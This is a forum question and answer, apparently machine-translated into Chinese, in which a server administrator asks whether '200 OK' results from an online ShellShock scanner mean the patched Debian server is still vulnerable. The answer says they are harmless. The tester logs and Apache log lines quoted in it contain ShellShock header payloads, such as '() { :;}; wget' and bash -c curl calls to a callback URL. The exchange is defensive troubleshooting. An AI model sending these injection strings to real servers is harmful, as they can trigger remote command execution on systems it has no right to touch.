Shell
ShellShock 測試顯示 wget 和 curl 訪問
我已經在我的 Debian 6 伺服器上修復了 shellshock 錯誤,在http://shellshock.brandonpotter.com/上進行測試時,我得到“未找到漏洞”,這沒關係,但他們也會檢查其他內容,並且在測試日誌中我得到:
URL mydomain.net (Root URL) (Header User-Agent exploit attempted with () { :;}; wget)... 200 OK URL mydomain.net (Root URL) (Header User-Agent exploit attempted with () { :;}; curl)... 200 OK URL mydomain.net (Root URL) (Header User-Agent exploit attempted with () { :;}; /usr/local/bin/wget)... 200 OK URL mydomain.net (Root URL) (Header User-Agent exploit attempted with () { :;}; /usr/bin/wget)... 200 OK URL mydomain.net (Root URL) (Header User-Agent exploit attempted with () { (a)=>' bash -c 'wget)... 200 OK URL mydomain.net (Root URL) (Header User-Agent exploit attempted with () { (a)=>' bash -c 'curl)... 200 OK URL mydomain.net (Root URL) (Header User-Agent exploit attempted with () { (a)=>' bash -c '/usr/local/bin/wget)... 200 OK URL mydomain.net (Root URL) (Header User-Agent exploit attempted with () { (a)=>' bash -c '/usr/bin/wget)... 200 OK URL mydomain.net (Root URL) (Header Cookie exploit attempted with () { :;}; wget)... 200 OK URL mydomain.net (Root URL) (Header Cookie exploit attempted with () { :;}; curl)... 200 OK URL mydomain.net (Root URL) (Header Cookie exploit attempted with () { :;}; /usr/local/bin/wget)... 200 OK ... ... ...“200 OK”可以嗎?200 表示可訪問。我檢查了幾個其他域,其中一些也顯示“200 OK”,但其他顯示“錯誤”。
它可以保持這樣還是我應該解決這個問題?如果是,我該怎麼做?
我已經在我的網站上檢查過,您不必擔心。
該站點對 進行了一些測試
/,它們不呼叫特定的 cgi 腳本。無論傳遞的引用者或使用者代理試圖利用什麼,這都會導致 200 OK。這是我的 apache 日誌顯示的範例:
75.127.84.182 - - [22/Oct/2014:11:52:54 +0200] "GET / HTTP/1.1" 200 5883 "() { (a)=>' bash -c 'wget http://shellshock.brandonpotter.com/report/TY7LR3VRD4E13X2XQXRUWV/Referer-bash-c-wget'" "-" 75.127.84.182 - - [22/Oct/2014:11:52:55 +0200] "GET / HTTP/1.1" 200 5883 "() { (a)=>' bash -c 'curl http://shellshock.brandonpotter.com/report/TY7LR3VRD4E13X2XQXRUWV/Referer-bash-c-curl'" "-"